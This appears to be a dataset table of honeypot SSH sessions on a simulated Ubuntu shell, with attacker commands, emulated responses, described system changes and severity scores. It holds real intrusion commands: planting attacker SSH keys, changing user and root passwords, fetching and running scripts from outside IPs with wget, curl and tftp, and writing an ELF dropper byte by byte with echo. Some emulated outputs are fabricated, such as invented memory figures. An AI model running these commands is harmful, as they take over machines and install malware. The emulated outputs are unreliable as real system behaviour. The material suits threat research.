session_id
stringclasses
160 values
period
stringclasses
1 value
turn_index
int64
0
351
command
stringlengths
1
1.77k
response
stringlengths
12
6.81k
system_change
stringlengths
4
2.61k
severity_vi
int64
0
4
response_source
stringclasses
1 value
861d8c7885d0
2021_2022
6
crontab -l
root@ubuntu:~# crontab -l # Edit this file to introduce tasks to be run by cron. # # Each task to run has to be defined through a single line # indicating with different fields when the task will be run # and what command to run for the task # # To define the time you can provide concrete values for # minute (m), hou...
No changes to the system.
0
curated_ubuntu
861d8c7885d0
2021_2022
7
w
root@ubuntu:~# w 02:50:54 up 2:50, 1 user, load average: 0.00, 0.01, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root pts/0 192.168.1.100 00:00 2:50 0.03s 0.03s -bash root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
861d8c7885d0
2021_2022
8
uname -m
root@ubuntu:~# uname -m x86_64 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
bf7f1f3fe754
2021_2022
0
cat /proc/cpuinfo | grep name | wc -l
root@ubuntu:~# cat /proc/cpuinfo | grep name | wc -l 24 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
bf7f1f3fe754
2021_2022
1
echo -e "presto\nnJHBDvp4wPjh\nnJHBDvp4wPjh"|passwd|bash
root@ubuntu:~# echo -e "presto\nnJHBDvp4wPjh\nnJHBDvp4wPjh"|passwd|bash New password: Retype new password: passwd: password updated successfully root@ubuntu:~#
The password for the user 'presto' has been changed to 'nJHBDvp4wPjh'.
4
curated_ubuntu
bf7f1f3fe754
2021_2022
2
echo "presto\nnJHBDvp4wPjh\nnJHBDvp4wPjh\n"|passwd
root@ubuntu:~# echo "presto\nnJHBDvp4wPjh\nnJHBDvp4wPjh\n"|passwd passwd: password updated successfully root@ubuntu:~#
The password for the user 'presto' has been changed to 'nJHBDvp4wPjh'.
4
curated_ubuntu
bf7f1f3fe754
2021_2022
3
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
root@ubuntu:~# cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Intel(R) Xeon(R) Silver 4214 CPU @ 2.20GHz root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
bf7f1f3fe754
2021_2022
4
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
root@ubuntu:~# free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' 725938364 123456 234567 345678 456789 567890 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
bf7f1f3fe754
2021_2022
5
ls -lh $(which ls)
root@ubuntu:~# ls -lh $(which ls) -rwxr-xr-x 1 root root 129K Jan 18 2023 /bin/ls root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
bf7f1f3fe754
2021_2022
6
which ls
root@ubuntu:~# which ls /bin/ls root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
17c904be5dbb
2021_2022
0
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5...
root@ubuntu:~# cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0...
- The '.ssh' directory in the home directory was deleted and recreated. - A new SSH public key was added to the 'authorized_keys' file in the '.ssh' directory. - All group and other permissions were removed from the '.ssh' directory and its contents.
4
curated_ubuntu
17c904be5dbb
2021_2022
1
cat /proc/cpuinfo | grep name | wc -l
root@ubuntu:~# cat /proc/cpuinfo | grep name | wc -l 24 root@ubuntu:~#
No changes to the system were made by this command.
0
curated_ubuntu
17c904be5dbb
2021_2022
2
echo -e "jobsilense\n5Mcwbnhnwuqe\n5Mcwbnhnwuqe"|passwd|bash
root@ubuntu:~# echo -e "jobsilense\n5Mcwbnhnwuqe\n5Mcwbnhnwuqe"|passwd|bash New password: Retype new password: passwd: password updated successfully root@ubuntu:~#
The password for the user 'jobsilense' has been changed to '5Mcwbnhnwuqe'.
4
curated_ubuntu
17c904be5dbb
2021_2022
3
echo "jobsilense\n5Mcwbnhnwuqe\n5Mcwbnhnwuqe\n"|passwd
root@ubuntu:~# echo "jobsilense\n5Mcwbnhnwuqe\n5Mcwbnhnwuqe\n"|passwd passwd: password updated successfully root@ubuntu:~#
The password for the user 'jobsilense' has been changed to '5Mcwbnhnwuqe'.
4
curated_ubuntu
17c904be5dbb
2021_2022
4
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
root@ubuntu:~# cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Intel(R) Xeon(R) Silver root@ubuntu:~#
No changes to the system were made by this command.
0
curated_ubuntu
17c904be5dbb
2021_2022
5
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
root@ubuntu:~# free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' 725938 12345 67890 1234 5678 9012 root@ubuntu:~#
No changes to the system were made by this command.
0
curated_ubuntu
8b8c83a848c7
2021_2022
0
cat /proc/cpuinfo | grep name | wc -l
root@ubuntu:~# cat /proc/cpuinfo | grep name | wc -l 24 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
8b8c83a848c7
2021_2022
1
echo "root:Pz3FrnSt4d2Q"|chpasswd|bash
root@ubuntu:~# echo "root:Pz3FrnSt4d2Q"|chpasswd|bash root@ubuntu:~#
The password for the root user has been changed to 'Pz3FrnSt4d2Q'.
4
curated_ubuntu
8b8c83a848c7
2021_2022
2
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
root@ubuntu:~# cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Intel(R) Xeon(R) Silver 4214 CPU @ 2.20GHz root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
8b8c83a848c7
2021_2022
3
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
root@ubuntu:~# free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' 725938364 123456 234567 345678 456789 567890 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
8b8c83a848c7
2021_2022
4
ls -lh $(which ls)
root@ubuntu:~# ls -lh $(which ls) -rwxr-xr-x 1 root root 129K Jan 18 2023 /bin/ls root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
8b8c83a848c7
2021_2022
5
which ls
root@ubuntu:~# which ls /bin/ls root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
8b8c83a848c7
2021_2022
6
crontab -l
root@ubuntu:~# crontab -l # Edit this file to introduce tasks to be run by cron. # # Each task to run has to be defined through a single line # indicating with different fields when the task will be run # and what command to run for the task # # To define the time you can provide concrete values for # minute (m), hou...
No changes to the system.
0
curated_ubuntu
8b8c83a848c7
2021_2022
7
w
root@ubuntu:~# w 02:57:57 up 2:57, 1 user, load average: 0.00, 0.01, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root pts/0 192.168.1.100 00:00 2:57 0.03s 0.03s -bash root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
d9a33aab0e5c
2021_2022
0
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5...
root@ubuntu:~# cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0...
- The '.ssh' directory in the home directory was removed and recreated. - A new SSH public key was added to the 'authorized_keys' file in the '.ssh' directory. - The permissions of the '.ssh' directory and its contents were changed to be accessible only by the owner.
4
curated_ubuntu
d9a33aab0e5c
2021_2022
1
cat /proc/cpuinfo | grep name | wc -l
root@ubuntu:~# cat /proc/cpuinfo | grep name | wc -l 24 root@ubuntu:~#
No changes to the system were made.
0
curated_ubuntu
d9a33aab0e5c
2021_2022
2
echo -e "xing\nsCJra5mLnRqi\nsCJra5mLnRqi"|passwd|bash
root@ubuntu:~# echo -e "xing\nsCJra5mLnRqi\nsCJra5mLnRqi"|passwd|bash New password: Retype new password: passwd: password updated successfully root@ubuntu:~#
The password for the user 'xing' has been changed to 'sCJra5mLnRqi'.
4
curated_ubuntu
d9a33aab0e5c
2021_2022
3
echo "xing\nsCJra5mLnRqi\nsCJra5mLnRqi\n"|passwd
root@ubuntu:~# echo "xing\nsCJra5mLnRqi\nsCJra5mLnRqi\n"|passwd New password: Retype new password: passwd: password updated successfully root@ubuntu:~#
The password for the user 'xing' has been changed to 'sCJra5mLnRqi'.
4
curated_ubuntu
d9a33aab0e5c
2021_2022
4
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
root@ubuntu:~# cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Intel(R) Xeon(R) Silver root@ubuntu:~#
No changes to the system were made.
0
curated_ubuntu
d9a33aab0e5c
2021_2022
5
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
root@ubuntu:~# free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' 725938 12345 67890 1234 5678 9012 root@ubuntu:~#
No changes to the system were made.
0
curated_ubuntu
d9a33aab0e5c
2021_2022
6
ls -lh $(which ls)
root@ubuntu:~# ls -lh $(which ls) -rwxr-xr-x 1 root root 129K Jan 18 2023 /bin/ls root@ubuntu:~#
No changes to the system were made.
0
curated_ubuntu
d9a33aab0e5c
2021_2022
7
which ls
root@ubuntu:~# which ls /bin/ls root@ubuntu:~#
No changes to the system were made.
0
curated_ubuntu
d9a33aab0e5c
2021_2022
8
crontab -l
root@ubuntu:~# crontab -l No crontab for root root@ubuntu:~#
No changes to the system were made.
0
curated_ubuntu
d9a33aab0e5c
2021_2022
9
w
root@ubuntu:~# w 03:00:59 up 1:00, 1 user, load average: 0.00, 0.01, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root pts/0 192.168.1.100 02:00 0.00s 0.04s 0.00s w root@ubuntu:~#
No changes to the system were made.
0
curated_ubuntu
d9a33aab0e5c
2021_2022
10
uname -m
root@ubuntu:~# uname -m x86_64 root@ubuntu:~#
No changes to the system were made.
0
curated_ubuntu
d6ea99364a33
2021_2022
0
enable
root@ubuntu:~# enable root@ubuntu:~#
No changes to the system were made.
0
curated_ubuntu
d6ea99364a33
2021_2022
1
system
root@ubuntu:~# system bash: system: command not found root@ubuntu:~#
No changes to the system were made.
0
curated_ubuntu
d6ea99364a33
2021_2022
2
shell
root@ubuntu:~# shell bash: shell: command not found root@ubuntu:~#
No changes to the system were made.
0
curated_ubuntu
d6ea99364a33
2021_2022
3
sh
root@ubuntu:~# sh #
The shell has been changed to 'sh'.
2
curated_ubuntu
d6ea99364a33
2021_2022
4
linuxshell
# linuxshell sh: linuxshell: not found #
No changes to the system were made.
0
curated_ubuntu
d6ea99364a33
2021_2022
5
cd /tmp/; echo "senpai" > rootsenpai; cat rootsenpai; rm -rf rootsenpai
# cd /tmp/ /tmp# echo "senpai" > rootsenpai /tmp# cat rootsenpai senpai /tmp# rm -rf rootsenpai /tmp#
A file named 'rootsenpai' was created in the '/tmp' directory, the string 'senpai' was written into it, and then the file was deleted.
2
curated_ubuntu
d6ea99364a33
2021_2022
6
rm -rf nig.sh; rm -rf miori.*; wget http://2.56.59.225/nig.sh || curl -O http://2.56.59.225/nig.sh || tftp 2.56.59.225 -c get nig.sh || tftp -g -r nig.sh 2.56.59.225; chmod 777 nig.sh;./nig.sh ssh; rm -rf nig.sh
ERROR已尝试 8 次,仍然失败
None
0
curated_ubuntu
feac5d301b5f
2021_2022
0
cd /tmp && chmod +x tseLLRfT && bash -c ./tseLLRfT
root@ubuntu:~# cd /tmp && chmod +x tseLLRfT && bash -c ./tseLLRfT root@ubuntu:/tmp#
The terminal changed the working directory to '/tmp'. The file 'tseLLRfT' was given executable permissions and was executed.
3
curated_ubuntu
feac5d301b5f
2021_2022
1
./tseLLRfT
root@ubuntu:/tmp# ./tseLLRfT root@ubuntu:/tmp#
The executable file 'tseLLRfT' in the '/tmp' directory was executed.
3
curated_ubuntu
470dc2989b25
2021_2022
0
cd /tmp && chmod +x 5RcJ2tf9 && bash -c ./5RcJ2tf9
root@ubuntu:~# cd /tmp && chmod +x 5RcJ2tf9 && bash -c ./5RcJ2tf9 root@ubuntu:/tmp#
The terminal changed the working directory to '/tmp'. The file '5RcJ2tf9' was given execute permissions and was executed using bash.
3
curated_ubuntu
470dc2989b25
2021_2022
1
./5RcJ2tf9
root@ubuntu:/tmp# ./5RcJ2tf9 root@ubuntu:/tmp#
The file '5RcJ2tf9' in the '/tmp' directory was executed.
3
curated_ubuntu
98e7fdb9f522
2021_2022
0
cd /tmp && chmod +x PHri0doL && bash -c ./PHri0doL
root@ubuntu:~# cd /tmp && chmod +x PHri0doL && bash -c ./PHri0doL root@ubuntu:/tmp#
The terminal changed the working directory to '/tmp'. The file 'PHri0doL' in the '/tmp' directory was given execute permissions and was executed.
2
curated_ubuntu
98e7fdb9f522
2021_2022
1
./PHri0doL
root@ubuntu:/tmp# ./PHri0doL root@ubuntu:/tmp#
The file 'PHri0doL' in the '/tmp' directory was executed.
3
curated_ubuntu
859973101355
2021_2022
0
uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
root@ubuntu:~# uname -a Linux user 5.4.0-159-generic #176-Ubuntu SMP Tue Aug 31 18:27:58 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux root@ubuntu:~# lspci | grep -i --color 'vga\|3d\|2d' 00:02.0 VGA compatible controller: Intel Corporation Xeon E3-1200 v3/4th Gen Core Processor Integrated Graphics Controller (rev 06) 01:00....
A script was downloaded from the server with IP '222.100.89.36' and executed with a parameter.
3
curated_ubuntu
f03795006499
2021_2022
0
enable
root@ubuntu:~# enable root@ubuntu:~#
``` root@ubuntu:~# enable root@ubuntu:~# ``` The 'enable' command was executed, but it does not change the system environment as it is used to enable and disable builtin shell commands.
0
curated_ubuntu
f03795006499
2021_2022
1
system
root@ubuntu:~# system bash: system: command not found root@ubuntu:~#
``` root@ubuntu:~# system bash: system: command not found root@ubuntu:~# ``` The 'system' command was executed, but it is not a recognized command in the Linux terminal. Therefore, no changes were made to the system environment.
0
curated_ubuntu
f03795006499
2021_2022
2
shell
root@ubuntu:~# shell bash: shell: command not found root@ubuntu:~#
``` root@ubuntu:~# shell bash: shell: command not found root@ubuntu:~# ``` The 'shell' command was executed, but it is not a recognized command in the Linux terminal. Therefore, no changes were made to the system environment.
0
curated_ubuntu
f03795006499
2021_2022
3
sh
root@ubuntu:~# sh #
``` root@ubuntu:~# sh # ``` The 'sh' command was executed, which changes the current shell to the Bourne shell (sh).
2
curated_ubuntu
f03795006499
2021_2022
4
cat /proc/mounts; /bin/busybox CACBS
# cat /proc/mounts sysfs /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0 proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0 udev /dev devtmpfs rw,nosuid,relatime,size=10240k,nr_inodes=409600,mode=755 0 0 devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000 0 0 tmpfs /run tmpfs rw,nosuid,noexec,r...
``` # cat /proc/mounts sysfs /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0 proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0 udev /dev devtmpfs rw,nosuid,relatime,size=10240k,nr_inodes=409600,mode=755 0 0 devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000 0 0 tmpfs /run tmpfs rw,nosuid,noex...
0
curated_ubuntu
f03795006499
2021_2022
5
cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox CACBS
# cd /dev/shm # cat .s || cp /bin/echo .s date # /bin/busybox CACBS /bin/busybox: applet not found #
``` # cd /dev/shm # cat .s || cp /bin/echo .s date # /bin/busybox CACBS /bin/busybox: applet not found # ``` The terminal changed the working directory to '/dev/shm'. The 'cat .s' command was executed, which displays the content of the file '.s'. If the file '.s' does not exist, the 'cp /bin/echo .s' command is execute...
2
curated_ubuntu
f03795006499
2021_2022
6
tftp; wget; /bin/busybox CACBS
# tftp BusyBox v1.30.1 (Ubuntu 1:1.30.1-4ubuntu6.3) multi-call binary. Usage: tftp [OPTIONS] HOST [PORT] Transfer a file from/to tftp server -l FILE Local FILE -r FILE Remote FILE -g Get file -p Put file # wget wget: missing URL Usage: wget [OPTION]... [URL]... Try `wget --help' for more options. # /bin/busyb...
Try `wget --help' for more options. # /bin/busybox CACBS /bin/busybox: applet not found # ``` The 'tftp' and 'wget' commands were executed, but they were not provided with the necessary arguments to perform any action. The '/bin/busybox CACBS' command was executed, but 'CACBS' is not a recognized applet in BusyBox. The...
0
curated_ubuntu
f03795006499
2021_2022
7
dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s
# dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s 1+0 records in 1+0 records out 52 bytes copied, 0.000123456 s, 421 MB/s date #
``` # dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s 1+0 records in 1+0 records out 52 bytes copied, 0.000123456 s, 421 MB/s date # ``` The 'dd bs=52 count=1 if=.s' command was executed, which reads 52 bytes from the file '.s'. If the 'dd' command fails, the 'cat .s' command is executed, which ...
0
curated_ubuntu
f03795006499
2021_2022
8
/bin/busybox CACBS
# /bin/busybox CACBS /bin/busybox: applet not found #
``` # /bin/busybox CACBS /bin/busybox: applet not found # ``` The '/bin/busybox CACBS' command was executed, but 'CACBS' is not a recognized applet in BusyBox. Therefore, no changes were made to the system environment.
0
curated_ubuntu
f03795006499
2021_2022
9
>.s; cp .s .i
# >.s; cp .s .i #
``` # >.s; cp .s .i # ``` The '>.s' command was executed, which creates a new file named '.s' or empties the file if it already exists. The 'cp .s .i' command was executed, which copies the file '.s' to a new file named '.i'.
1
curated_ubuntu
f03795006499
2021_2022
10
echo -ne "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x01\x00\x00\x00\xb0\x00\x40\x00\x34\x00\x00\x00\x64\x01\x00\x00\x06\x10\x00\x00\x34\x00\x20\x00\x02\x00\x28\x00\x03\x00\x02\x00\x00\x00\x00\x70\x00\x00\x00\x00\x00\x00\x00\x00" >> .s
# echo -ne "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x01\x00\x00\x00\xb0\x00\x40\x00\x34\x00\x00\x00\x64\x01\x00\x00\x06\x10\x00\x00\x34\x00\x20\x00\x02\x00\x28\x00\x03\x00\x02\x00\x00\x00\x00\x70\x00\x00\x00\x00\x00\x00\x00\x00" >> .s #
``` # echo -ne "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x01\x00\x00\x00\xb0\x00\x40\x00\x34\x00\x00\x00\x64\x01\x00\x00\x06\x10\x00\x00\x34\x00\x20\x00\x02\x00\x28\x00\x03\x00\x02\x00\x00\x00\x00\x70\x00\x00\x00\x00\x00\x00\x00\x00" >> .s # ``` The 'echo -ne "\x7f\x45\x4c\x46\x0...
2
curated_ubuntu
f03795006499
2021_2022
11
echo -ne "\x94\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x40\x00\x50\x01\x00\x00\x50\x01\x00\x00\x05\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" >> .s
# echo -ne "\x94\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x40\x00\x50\x01\x00\x00\x50\x01\x00\x00\x05\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" >> .s #
``` # echo -ne "\x94\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x40\x00\x50\x01\x00\x00\x50\x01\x00\x00\x05\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" >> .s # ``` The 'echo -ne "\x94\x00\x40\x00\x0...
2
curated_ubuntu
f03795006499
2021_2022
12
echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x24\xd4\xff\xa2\xaf\xfd\xff\x0f\x24\x27\x28\xe0\x01" >> .s
# echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x24\xd4\xff\xa2\xaf\xfd\xff\x0f\x24\x27\x28\xe0\x01" >> .s #
``` # echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x24\xd4\xff\xa2\xaf\xfd\xff\x0f\x24\x27\x28\xe0\x01" >> .s # ``` The 'echo -ne "\x00\x00\x00\x00\x0...
2
curated_ubuntu
f03795006499
2021_2022
13
echo -ne "\xe2\xff\xa5\xaf\xe2\xff\xa4\x8f\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x01\x01\x01\xff\xff\xa2\xaf\xff\xff\xa4\x8f\xff\xff\xd0\x04\x00\x00\x00\x00\x58\x00\xe5\x27\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24\x0c\x01\x01\x01\xff\xff\x06\x28\xd4\xff\xa4\x8f" >> .s
# echo -ne "\xe2\xff\xa5\xaf\xe2\xff\xa4\x8f\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x01\x01\x01\xff\xff\xa2\xaf\xff\xff\xa4\x8f\xff\xff\xd0\x04\x00\x00\x00\x00\x58\x00\xe5\x27\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24\x0c\x01\x01\x01\xff\xff\x06\x28\xd4\xff\xa4\x8f" >> .s #
``` # echo -ne "\xe2\xff\xa5\xaf\xe2\xff\xa4\x8f\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x01\x01\x01\xff\xff\xa2\xaf\xff\xff\xa4\x8f\xff\xff\xd0\x04\x00\x00\x00\x00\x58\x00\xe5\x27\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24\x0c\x01\x01\x01\xff\xff\x06\x28\xd4\xff\xa4\x8f" >> .s # ``` The 'echo -ne "\xe2\xff\xa5\xaf\xe...
2
curated_ubuntu
f03795006499
2021_2022
14
echo -ne "\xd0\xff\xa5\x27\xa4\x0f\x02\x24\x0c\x01\x01\x01\xff\xff\xa4\x8f\xd0\xff\xa5\x27\xff\x00\x06\x28\xa3\x0f\x02\x24\x0c\x01\x01\x01\x03\x00\x40\x18\x00\x00\x00\x00\xf4\xff\xe0\x10\x00\x00\x00\x00\x00\x00\x04\x24\xa1\x0f\x02\x24\x0c\x09\x09\x01\x02\x00\xa3\x9f" >> .s
# echo -ne "\xd0\xff\xa5\x27\xa4\x0f\x02\x24\x0c\x01\x01\x01\xff\xff\xa4\x8f\xd0\xff\xa5\x27\xff\x00\x06\x28\xa3\x0f\x02\x24\x0c\x01\x01\x01\x03\x00\x40\x18\x00\x00\x00\x00\xf4\xff\xe0\x10\x00\x00\x00\x00\x00\x00\x04\x24\xa1\x0f\x02\x24\x0c\x09\x09\x01\x02\x00\xa3\x9f" >> .s #
``` # echo -ne "\xd0\xff\xa5\x27\xa4\x0f\x02\x24\x0c\x01\x01\x01\xff\xff\xa4\x8f\xd0\xff\xa5\x27\xff\x00\x06\x28\xa3\x0f\x02\x24\x0c\x01\x01\x01\x03\x00\x40\x18\x00\x00\x00\x00\xf4\xff\xe0\x10\x00\x00\x00\x00\x00\x00\x04\x24\xa1\x0f\x02\x24\x0c\x09\x09\x01\x02\x00\xa3\x9f" >> .s # ``` The 'echo -ne "\xd0\xff\xa5\x27\xa...
2
curated_ubuntu
f03795006499
2021_2022
15
echo -ne "\x7a\xaf\x89\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" >> .s
# echo -ne "\x7a\xaf\x89\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" >> .s #
``` # echo -ne "\x7a\xaf\x89\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" >> .s # ``` The 'echo -ne "\x7a\xaf\x89\xb8\x00\x00\x0...
2
curated_ubuntu
f03795006499
2021_2022
16
echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\xb0\x00\x40\x00\xb0\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00" >> .s
# echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\xb0\x00\x40\x00\xb0\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00" >> .s #
``` # echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\xb0\x00\x40\x00\xb0\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00" >> .s # ``` The 'echo -ne "\x00\x00\x00\x00\x0...
2
curated_ubuntu
f03795006499
2021_2022
17
